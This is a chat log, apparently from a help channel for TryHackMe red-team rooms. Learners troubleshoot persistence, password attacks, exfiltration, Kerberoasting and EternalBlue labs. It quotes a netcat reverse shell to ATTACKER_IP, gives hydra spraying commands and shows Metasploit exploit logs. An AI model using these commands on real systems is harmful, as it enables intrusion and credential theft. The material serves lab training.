So that would also be a way, if I am Admin, to install this tool in order to access the registry with high privileges faster. But then I have to be careful to remove this tool and the logs that I made with it. In a red team scenario it will be complicated, but for a regular pentest it should be good, I think
Yup, but the majority of the time you can find these Sysinternals tools on the system in larger environments
these tools help sysadmins manage many things
one of the tools is Sysmon https://tryhackme.com/room/sysmon to monitor and log events of a Windows system
You don't need to install it. You can simply transfer the portable exe to the victim in order to use it.
https://learn.microsoft.com/en-us/sysinternals/downloads/
You can download this tool suite to your machine to explore it more
one of the websites for Sysinternals is a phishing page, so don't go there
they simply replace l with i
Oh, cool
What do you mean?😅 Where is this page?
⚠️ This is a phishing website, so be careful before downloading from a Google search!
Meaning their tools might be malicious
Here is the official Microsoft link to download
https://learn.microsoft.com/en-us/sysinternals/downloads/
Ok, thank you for the information!😊
Hello, I am trying to do just the Logon Script part for flag13.exe but I cannot get any session
Share the details with me please
I also tried the 3rd problem and the flag is not working:
Can we talk about this one first? 😄 Because I am already in this environment
I mean this one
But you get the shell, right?
Yes the shell is working
Yes, is working now 🎉
OK, good
And for the other one, I set the UserInitMprLogonScript variable with revshell.exe as the Data parameter
Everything looks OK
Check if revshell.exe is on that path
Second, check the listening port and the port set in the payload
Third thing: HKCU changes only apply to the current user
Try the HKLM environment change
And remember, after signing out and logging in again you will get the shell after a few seconds, not as fast as the previous flag12 registry
All should be set correctly. I will try HKLM
I think that this is not applicable in HKLM and I have to set it for all users in HKCU
I got it now. The problem was that I was opening regedit from PsExec instead of opening it from the Start menu. So I think I edited the variable for the SYSTEM user
Thanks again!
Exactly, you are right
I need help in task 2 of Signature Evasion, pls
Is something wrong with this Neo-reGeorg?
wtf is wrong with this netplan in the AttackBox?!
TryHackMe - Signature Evasion - Task 3 + hint for task 2: search on YouTube and watch the video to get the answer
in Weaponization, did anyone have trouble with the user emulation app? It looks like port 8080 isn't open
Terminated the machine and restarted it to fix.
when you split the payload and reach a dead end where you don't know where to go,
round the payload size to the first thousand, e.g. 33930370, round it to 33931000
or just automate the splitting process and round the resulting bytes
using the tool described in the next task
I'm in the Password Attacks section, task number 8, and I need to create some custom JtR rules. I have edited /etc/john/john.conf, but it tells me I do not have any custom rules
your own VM or the AttackBox???
own VM. I'm trying to upload a screenshot 🙂
!docs verify
@obsidian sundial ⬆️ follow the instructions in this link to verify to be able to post screenshots
OK, I'll try like this
```
john --wordlist=clinic.lst --rules=THMPW --stdout
Using default input encoding: UTF-8
No "THMPW" mode rules found in /etc/john/john.conf
```
so this is the error on my own VM
and this is my john.conf
```
tail -f 10 /etc/john/john.conf
tail: cannot open '10' for reading: No such file or directory
==> /etc/john/john.conf <==
# include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)
# This is disabled by default since it's a security risk in case JtR is ever run with untrusted current directory
#.include './john-local.conf'

# End of john.conf file.
# Keep this comment, and blank line above it, to make sure a john-local.conf
# that does not end with \n is properly loaded.
[List.Rules:THMPW]
[!@]Az"[0-9][0-9]"
```
Probably it's not getting loaded because you put it at the very end of the file.
You might want to add your rule somewhere near the other rules in the .conf file
I tried (elcocohtb is my other account) indeed, but that does not have any other effect
for sure I made a mistake somewhere, but I don't seem to find where
Stuck on Task 9 of the Password Attacks room.
Here are the steps I've followed:
- Used the given usernames in the example usernames-list.txt.
- Generated a pass1.lst with "Spring Summer Fall Winter".
- Expanded it using the rule THM-Pass `Az"[2][0][2][0-3]" ^[!@]` based on the question hint. Command used was: `john --wordlist=pass1.lst --rules=THM-Pass --stdout > pass2.lst`.
- Attempted a password spraying attack using: `hydra -L usernames-list.txt -P pass2.lst ssh://10.10.147.70 -t 4`. And following is the output:
What am I doing wrong? Should I change the rule somehow to get a hit?
Never mind, found the issue. The rule should have been `Az"[2][0][2][0-3]" $[!@]`, which appends the special character at the end instead of at the beginning. Got the password. :)
set the wrong password and username parameters
capture through Burp Suite or Firefox > Inspect > Network tab and find out, bro, easy
Hello, I am doing the Data Exfiltration room and at the ICMP part I do not get any messages through nping. These are my options:
avoid the Metasploit, brother, good framework for pentesting but it's ok
Intro to C2 Task 5, not sure about how to port forward. The 192.x.x.x should be replaced by what IP? I'm using the AttackBox.
Hi! I have a conceptual doubt about the difference between LDAP authentication and NetNTLM authentication, specifically the fact that the user actually logs in to the DC with LDAP and doesn't with NetNTLM; instead, it is the application that logs in for him.
My doubt is: if the user doesn't get logged in to the DC with NetNTLM, where does he get logged in, and what exactly is the meaning of "the application logs on his behalf"? Does the application have various credentials for each user or something of the kind? Thanks!
Is there any bug in that OPSEC Task 7? I tried all possible combinations
it needs 4 different combinations one after the other
so if you tried all of the ones for the first one, you're probably on the second one now
Does not seem to work. I do not know if it is me or the box. :/
are you okay with shadow DMing you the numbers??? As well, this is probably not teaching you anything and is mostly brute forcing the numbers anyway
oh wait no, shadow sees your error
you must have spaces between all the numbers for some reason
yes, the spaces are mandatory
ohhh thank you
will wait a bit.... send shadow a direct message if you need help instead of doing it yourself
Hey, not sure I follow all of your question, but if you are talking about logging in to the LDAP service of an Active Directory server, LDAP uses SASL for authentication, which is simply a middle layer that ends up connecting to the actual authentication providers. In the end, SASL will usually have Kerberos and NTLM as auth providers, which means that when you log into LDAP, you are probably using Kerberos (or NTLM) anyway
Thank you very much! I got it!
nice and congrats
Room: Windows Local Persistence
Task: 2
Issue: Following the instructions in task 2, I used evil-winrm to download sam.bak and system.bak to my local machine. However, they don't show up anywhere (especially not in the mentioned location). Anyone know what's going on?
I even tried specifying a file path after, but still the same.
Tried using find? E.g. `find / -type f -name '*system.bak' 2>/dev/null`
In the Data Exfiltration room we exfiltrate data through the DNS protocol and THM provides us a web interface to make this step easy. I am curious how this is done in real life?
Thanks!
Hey, can someone explain why in Red Team Engagement Task 7 we have
and the answer to the question "When will the engagement end? (MM/DD/YYYY)" is actually 14/11/2021??
are the engagement dates the day both parties approved it?
Try to refresh the page
And you have to look at Execution Dates
There you will find the last date
After refreshing I still have the same dates
that's what I did
but what does this line mean, then?
Post-exploitation is the steps after the exploit has been done
Like cleaning the footprints, making backdoors. So as you can see, that one is the last date registered
mh, OK, it is just a step in the whole process
For some reason it simply didn't get downloaded to my local machine. Completed the task using the AttackBox. Thanks for this though.
Hello, can you give more details?
I'm on Task 6 in the Data Exfiltration room. I'm trying to run the `python3 neoreg.py -k thm -u http://10.10.x.x/uploader/files/tunnel.php` command, but it gives me an error: "Georg is not ready, please check URL and KEY." I've confirmed the tunnel.php file has been uploaded. Not sure how to proceed.
I've even tried to use "-k admin" as the key, and that didn't work either.
Ah - I think I got it ... I had to also regenerate all of the template files using the correct key as well
is Evading Logging and Monitoring bugged?
in the forum everyone says task 10 doesn't work
I've tried with the walkthrough but nothing
can anyone help me?
Yeah everyone is having issues with task 10
Having trouble with the last flag of Windows Local Persistence, the MSSQL one; the web application simply does nothing when clicking the button, so no data is inserted and the trigger isn't called. Has this happened to anyone?
Solved it in the meantime?
Yes, terminating the instance and starting a new one fixed it, don't know what got it stuck
hey everyone, I am having trouble accessing the AV Shellcode Evasion module; the Win machine says password expired
anyone else having this issue?
Staff is already aware of it, hopefully it will be fixed soon
Oh okay thank you!!
Hey good people, I'm in the room Signature Evasion Task 5 and it asks me to check the "shell.exe" file in CyberChef, yet the machine doesn't have an internet connection. How am I supposed to upload the file to the site?
How can I do that? I tried to connect to SMB but it asks for the root password
is there something wrong with this Win Local Persistence task 6 last flag?
it ain't returning any rev shell
went through this room and all my notes; everything requires SSH or NC, which I do not have
Will do, thank you !
looks like flag13 is broken
Was working fine for me, what's the issue?
after I sign out and RDP again, I never got the shell. Tried it like 4 times, even on the AttackBox
Why would you have to RDP again?
You just sign out and back in, iirc?
oh sorry, here's what they say: "After doing this, sign out of your current session and log in again". So I sign out, but I didn't find how to sign in again, so I just RDP again
when I sign out, I lose my RDP session. So I have to RDP again
ya, I did
I even tried from the web browser too, and after signing out there's an option to reconnect, but got the same problems
I did the same for the other 2 flags and they work
Have you restarted the target machine already ?
ya...
Can I RDP to your machine to see for myself?
sure
k
Would need the IP then 🙂
can I DM you?
Ye
I feel like an idiot, I didn't manage to transfer the file. Can I DM you for help?
I understand, I just don't manage to get what to do. I can't download any tool on that machine, and half of the stuff I try to move there using the Linux server gets deleted by Defender, very frustrating
Thank you lassi, I will try
I DID IT !!!
hey guys, anyone having issues with adding the DNS to the Breaching AD box?
I tried it on several OSes and can't ping the website requested or even ping the DC
Do you use the special Breaching VPN config?
yeah
Yes
Hello,
I keep getting an error when trying to exploit the Windows machine on Intro to C2
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
this is the config
I'm on the Kali browser machine
Are you on the AttackBox or the Kali web box?
Kali
That's outdated, you should use the AttackBox instead.
ok, trying with the AttackBox
In this, which domain will contain the forest DC (the DC with the Enterprise Admins group)?
What should be configured between two domains for a user in Domain A to access a resource in Domain B?
A one-way trust between the two domains, "B trusts A", would work. But this is not the answer to complete the lab; someone help me
Hey guys, I'm doing the Windows Privilege Escalation module in this path and I see this ^
Any idea what LOCAL represents in this command and why it is necessary?
I think it's used to tell the script to use the files you have locally, rather than to dump it from a remote machine
Hello people. In https://tryhackme.com/room/windowslocalpersistence, Task 6, I implemented all the steps to obtain flag 13, but I receive an error even after repeating all the steps. Is there something I'm missing?
Screenshot of the registry editor ?
@native berry there you go
Did you undo the registry settings for the previous task, the one for flag 12?
Or use a different port for your rev shell than for the previous task?
I deleted the old shell (to obtain flag 12) and generated a new reverse shell with a different port, but did not revert the registry settings to obtain flag 12.
OK, well, if you are sure that the rev shell you caught is not the one from the previous section, then I don't see anything wrong there.
Maybe restarting the machine and redoing it fixes it
let me try
@native berry turns out re-instantiating the VM worked. Thanks.
What I wonder is how the other registry settings could have affected getting flag 13, 'cause ideally they are supposed to be isolated, no?
or it could have been my mistake all along somehow? 🤔
Dunno what the reason was 😄
anyway, thanks again
Signature Evasion task 2
To the nearest kibibyte, what is the first detected byte?
I split the shell.exe and got to the point where it's not detecting anymore, but the value I put, 50xxx, is not the answer. Anyone can nudge me on that???
what's a kibibyte exactly and what's the format
NVM got it
Am I the only one to get this error? Can somebody help me fix this?
Tried commenting out the line that has the quoting_detection_proc() function, but that didn't work either
Tried this from the AttackBox and it looks to work, but there's an authorization issue.
Any help would be appreciated!
Include the room and the task you are doing pls
Oh sorry, forgot to mention
Room: Windows Local Persistence
Task: 2
Show a screenshot of `net localgroup` run in cmd on the target machine pls
Ah no, sorry, run `net user thmuser1` pls
Sure
There you go
Okay, now the tool looks to function properly. Just re-ran the command and it worked.
But this works on the AttackBox and not on my machine
I still get this error on my machine
Screenshot of your OpenVPN output when connecting to the VPN, as well as a screenshot of `ip a`?
Can I try to connect to your target machine via that command myself ?
I am able to connect to the target from the AttackBox now
But it looks like it's an evil-winrm issue
That's why I am unable to hit the target machine from my personal machine
I know, but I thought you wanted to be able to connect from your machine?
If you are good with doing it from the AttackBox, I'll leave it at that
Not really. I want to connect from my machine
You can check from your end, no issues
Seems to work fine for me, I'm on evil-winrm v3.4
What's your OpenSSL version?
Not sure if it's from there, or from your OpenSSL version, or even from the VPN
I doubt it's the OpenSSL version. I'm on 1.1
1.1 too
Oh
Evading Logging and Monitoring task 10: the binary is stuck, any help?
Do I have to be on the VPN to access this URL https://clinic.thmredteam.com/
It's not loading
Yeah, it turns out that I have to be on the VPN
Is there anything missing in my command? I'm waiting forever, never hitting the right password: `hydra -l burgess -P clinic.lst 10.10.102.122 http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php" -V -I -T 64 -f`. I modified clinic.lst with the Single-Extra john rule. Password Attacks room Task 8
I also tried with `:F=Invalid username or password.`
hey guys, I'm doing the Breaching AD room. I've got to the part of brute forcing NTLM with the Python script, but when I tried to brute force NTLM with hydra I couldn't figure out how to do it. Can anyone help me?
Hydra is for online password cracking, like SSH and HTTP. If you have an NTLM hash you want to crack you need either john or hashcat
having an issue with Weaponisation - Windows Scripting Host. Keep getting a "cannot find script file" error. Paths are correct (I'm in the same folder) and I've simplified the payload to just a pop-up in case it was an issue there. Also tried resetting the AttackBox. Still getting it. Anyone had this before?
Can you show exactly what command you're running if you haven't fixed the issue yet?
I've put it in as a bug. I can get the command to run on a Windows VM but not on the AttackBox. May be some THM issue.
Could be, I remember running into some sort of problem myself with that same step but I can't remember how I fixed it
In the room https://tryhackme.com/room/winadbasics, there is a question in the Trusts section
What should be configured between two domains for a user in Domain A to access a resource in Domain B?
I know that it should be B trusts A, but THM is not accepting the answer. Please help, someone
Trust Relationships
Having multiple domains organised in trees and forest allows you to have a nice compartmentalised network in terms of management and resources. But at a certain point, a user at THM UK might need to access a shared file in one of MHT ASIA servers. For this to happen, domains arranged in trees and forests are joined together by trust relationships.
see title of this section and think a tiny bit more
Lol that was quick and trivial. Thanks for support
no problem
https://tryhackme.com/room/monitoringevasion
any hint for task number 10?
when I use the t2 user credential obtained from distributor.za.tryhackme.com/creds_t2, I accept the license with xfreerdp and then it gives me the following error: 'license connection sequence aborted.' It's Lateral Movement and Pivoting task 6. How to fix it?
Apologies, this is a few days back, but you do not need to be on the VPN
not sure what you experienced but that is a public domain
Any idea on how to do this. I am stuck at this as well.
I have got agent.exe on my local machine and ran strings. Couldn't get the flag. Any idea what I should do next?
Ran ghidra on it, but I don't know it so can't make heads or tails of it. :')
Got the flag! Converted the hex to text. :D
🙂
ok, this is gonna sound dumb, but I'm doing the Windows Local Persistence room and I don't know how to get the flags from the .exe files; the room says to execute them. I'm connected via evil-winrm and I've used these commands and nothing happens
do something like `.\flag1.exe`
or drop down to a cmd and do that, or run `Invoke-Expression -Command "flag1.exe"` in your PS
it worked! Appreciate it. Yeah, forgot this was PowerShell; the commands I found were for cmd
the .\?
yup!
gotcha thanks I'll remember that
🙂 sounds good!
can you tell me how you found the flag?
- Used scp to get agent.exe to my local Kali machine.
- Tried Sysinternals strings, didn't get the flag with a grep "THM".
- Ran Ghidra on agent.exe.
After that you need to be a bit creative, just looking for the flag in the code won't work. You need to do some encoding decoding.
You just get the binary for the whole code and convert it to text.
You should see the flag.
can you just DM the flag plz
Nah, I can't do that. I've already told you everything.
I already did the task
Hey guys, I'm currently going through the Red Teaming learning path and have hit a road block. In Red Team OPSEC, task 2, when I go to view site, there is no option to confirm or continue. I can only check off the boxes. At the bottom it notes: "(Please note that some browser extensions, such as NoScript, might prevent the site from loading correctly.)". I currently have no browser extensions and have tried performing the same task across several browsers. Any thoughts?
Hi everyone. I'm doing a red team room and exploring the GHDB (Google Hacking DB). Is it normal for companies to have private RSA keys exposed, and if they are available, what can be done with them? Maybe some kind of DNS poisoning or MITM attack? Just my guesses...
So, the best way to think of this is like a number lock / pad lock. Once you have the correct combination of answers selected it will proceed to the next question or give you the flag.
The whole idea of a private key is to stay... private. What you can do with it depends on what the key is normally used for. Probably you can sign tokens or documents with it that appear as if the company created them.
hello, I am finishing the nmap practice but I don't know which is the target machine for the scanning
Which room?
Hello, I am on the Lateral Movement and Pivoting room, task 3, and I don't understand why we use the command `runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"`. At the end we are connected as the same user and not t1_leonard.summers (and I understood it's because of the netonly argument). So my question is, why do we do this step? Thanks
There is a dedicated channel for that room.
You might want to go through previous messages to see if that already got asked.
#lateral-movement-and-pivoting
@native berry Thanks
Hi! Please tell me!
Credentials Harvesting
Task 4 Local Windows Credentials
Why is it that when you try to copy a file, you are denied access?
Permission denied, please try again.
Although they write in the task:
Now we have both required files, transfer them to the AttackBox with your favourite method (SCP should work).
how do we check the last user logon in Windows again, instead of checking each and every user like this:
```
net user john /domain | findstr /C:"Last logon"
```
there is no need to decode anything, I used dnSpy, it's plain text
really stumped at what should be a basic challenge in Task 4 of the "Password Attacks" room... I even found a writeup online with the exact same answer I was trying, which makes me wonder if there isn't some sort of bug going on?? I'm referring to the crunch question. I'm pretty confident the answer is ||crunch 5 5 -t "THM^!" -o tryhackme.txt||
Strings couldn't find it because there were some garbage values separating the flag, which is why I thought to decode from the binary in Ghidra, which worked. I'm glad you got the flag as well; I didn't try dnSpy.
@karmic junco Ah, yes I get it now. Thank you!
Gave +1 Rep to @karmic junco
Insert flag17 here https://tryhackme.com/room/windowslocalpersistence how to solve the problem can any one say
Hello everyone
Who passed the room - Credentials Harvesting
I still can't figure out what prevents copying files in tasks 4 and 7
Neither through Linux nor Windows.
Your password seems to be wrong. And you have spaces in your path
cannot stat Directory/ntds.dit indicates that it splits the path
I don't think the problem is spaces and password..
and it's hard to make a mistake with a password)
Hi, does Administrator:tryhackmewouldnotguess1@ work? I'm trying to start at Task 2.
What?
From the second screenshot... I believe the account for the AttackBox is root and not thm.
Try clicking on the info (small i icon) below the split view window for your AttackBox for your username and password.
The credentials you see here aren't the one for your AttackBox, please check.
Tried, yes, showing credentials specifically for me:
But it didn't help!
What am I doing wrong?
As I understand it, these are AttackBox credentials
and NOT windows machines.
I'm trying to copy files from the windows machine to my attacking machine.
I need credentials from windows.
And this, as I understand it:
the IP address of the machine: 10.10.34.180
User Name: thm
Password: Password!
It's okay, I figured it out.
My head is completely confused...in all of this.
Thank you!)
That's who else would help to sort out this problem.
(maybe everything is also being solved banally)🤔
#persisting-ad message
Room: Windows Local Persistence
Task2: Tampering With Unprivileged Accounts
Section: Assign Group Memberships
I did everything as suggested in the room but when I execute the flag as admin it wouldn't give me the result. Why is that?
Could anybody help please?
the credentials work after reset.
Hello all, just wondering how did you install the DSinternals in persistence through SID history? via offline mode?
Hi, does someone know what the reason can be that, when using the VPN, the listening port never works?
We need some more context...
Maybe the listening port is already in use. Try other ports.
Hi all. In the Intro to C2 part, the EternalBlue exploit isn't working. It fails for some reason.
You're gonna need to provide more info; it's kinda hard to answer a question like that.
I would like to upload a screenshot but I can't
I set up the exploit in Metasploit. Set remote hosts and local host. Meterpreter as the default payload, and exploit.
The exploit tried three times and failed:
```
[+] 10.10.50.188:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.50.188:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.50.188:445 - Sending all but last fragment of exploit packet
[*] 10.10.50.188:445 - Starting non-paged pool grooming
[+] 10.10.50.188:445 - Sending SMBv2 buffers
[+] 10.10.50.188:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.50.188:445 - Sending final SMBv2 buffers.
[*] 10.10.50.188:445 - Sending last fragment of exploit packet!
[*] 10.10.50.188:445 - Receiving response from exploit packet
[+] 10.10.50.188:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.50.188:445 - Sending egg to corrupted connection.
[*] 10.10.50.188:445 - Triggering free of corrupted buffer.
[-] 10.10.50.188:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.50.188:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.50.188:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
```
I've restarted three times so far xD
Finally, after one hour of trying. I think this is because EternalBlue usually harms the machine.
There is a channel specifically for malware discussion, it's not here.
Non-offensive projects are good,
Probably best sticking to one language to start off with, you might end up confusing the two languages.
What's its name?
You only get access to it under certain criteria.
0xD is one,
Having OSCP etc is one.
Hi, I am exploiting Blue, using my own attack machine connected via VPN. I have set the LHOST to the tun0 IP from the VPN, but it's not working...
```
[*] Started reverse TCP handler on VPN_IP:4444
[*] 10.10.135.77:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.135.77:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.135.77:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.135.77:445 - The target is vulnerable.
[*] 10.10.135.77:445 - Connecting to target for exploitation.
[+] 10.10.135.77:445 - Connection established for exploitation.
[+] 10.10.135.77:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.135.77:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.135.77:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.135.77:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.135.77:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.135.77:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.135.77:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.135.77:445 - Sending all but last fragment of exploit packet
[-] 10.10.135.77:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Exploit completed, but no session was created.
```
Can I have some help with this please?
Is there some channel to ask about this type of problem related to machines?
You put in VPN_IP as your lhost instead of an actual IP
Unless you manually changed that before posting the error in here
Shouldn't the machines in the red-team-path be reachable via RDP over the internet when the info says so?
But all ports are filtered on the "Windows Internals" box when trying to reach it. Only accessible via the split view in the browser, as it seems?
Ah okay makes sense. Had a long day trying to learn C++ ... that takes away your sanity after a while. Thanks for noting the obvious. 😄
Gave +1 Rep to @weak ice
hello people. how does one find stack arguments in ProcMon?
I've tried searching everything on Google, but to no avail.
Is programming mandatory in red teaming? If it is, which languages are useful to learn?
I'm currently doing the Jr Penetration Tester path and will do red teaming soon.
I would say it's a desirable skill rather than a mandatory one, especially if you will be developing your own tools and exploits.
Hi, ideas please. Using Kali as attack box. Credentials Harvesting room, last task, Kerberoasting, having trouble obtaining the SPN account. I can execute the initial command: `python /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.240.27 THM.red/thm -request-user svc-user` **But the request for the SPN returns errors:** `python /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.240.27 THM.red/thm -request-user svc-thm`
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
Password:
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B5, comment: AcceptSecurityContext error, data 52e, v4563
If you are using your own attack VM, try using impacket-0.9.19.
Thanks, I am using my own box (THM only opens to the RDP session), not sure how to downgrade to 0.9.
Thanks, it led to more errors: `python3.9 ~/Downloads/impacket0.9.19/impacket-0.9.19/examples/GetUserSPNs.py -dc-ip 10.10.240.27 THM.red/thm -request-user svc-thm`
```
  File "/home/kali/Downloads/impacket0.9.19/impacket-0.9.19/examples/GetUserSPNs.py", line 63
    print outputFormat.format(*header)
                     ^
SyntaxError: invalid syntax
```
You might have to use the Python 2 version of impacket.
Thanks for the help. Sounds like a lot of reconfiguring; I went back to using the AttackBox for the last steps.
hehe alright.
I'd like to know how to do it independently of the AttackBox, but apparently there is too much versioning built into this task. Thanks again.
You could opt to use pyenv on your personal attack box and make a dedicated virtualenv in Python 2 that supports impacket 0.9.19.
https://www.kali.org/docs/general-use/using-eol-python-versions/ this doc explains it in detail
In December of 2019 we released a blog post talking about how we will deal with Python 2's End-of-Life. Since then there have been quite a lot of tools that users use that have not been ported to Python 3, causing issues when they try to use them. This page will cover a way of using the deprecated version in a safe way.
Hi there, does anyone know a workaround to access the machine in the Weaponization room? The credentials provided in the details of the room are not working.
Which machine?
What's the title of it in the "Active machine information" box?
Win10-UserSimV1.1
There are no creds provided for that machine as you are not supposed to RDP into it.
The creds you refer to are for the previous machine.
Room: https://tryhackme.com/room/windowslocalpersistence
Task: 2
I am unable to fetch the config.inf file as mentioned in the description. Please suggest what to do.
The file will be created where you run the command. So in your terminal you seem to be in C:\ when running the command. Your file will then be at C:\config.inf
Heya
I'm doing the Lateral Movement network. Got into the IIS machine, but when Flag.exe is run, it displays: Sorry! You're still missing something, no flag for you yet (7)
My guess is that I didn't auth properly against the DC with /netonly,
because that's the only thing I could've f'ed up without knowing about it. Having said this, I have no idea how to do that properly, and yes, I did complete the AD enum network before this one.
Could somebody give me a nudge or something, pretty please?
Also, say in case nc64.exe wasn't available, can we just upload the bin ourselves? Like a precompiled socat one, for example? Having nc installed like that seems all too convenient.
Oh and I decided to use a cmd reverse shell instead of meterpreter. I don't like relying on metasploit :D
Moving this to lateralmovement network chat
Hello! In the Password Attacks room, task 3, I was surprised to learn that when you run `sort combined_list.txt | uniq -u > cleaned_combined_list.txt` it deletes both duplicates; I expected it to keep one of them. Perhaps this should be mentioned in the task?
In this example "abc" is present twice in 3.txt and both are removed in the sorted file 4.txt.
Hi. Has anyone else had challenges building Armitage in "Setting up a C2 Framework"? Following the steps, I have updated Gradle to 7.2 to work with the version of OpenJDK, but then:
```
FAILURE: Build failed with an exception.
* What went wrong:
Execution failed for task ':cortana:jar'.
```
I am using Kali 2022.4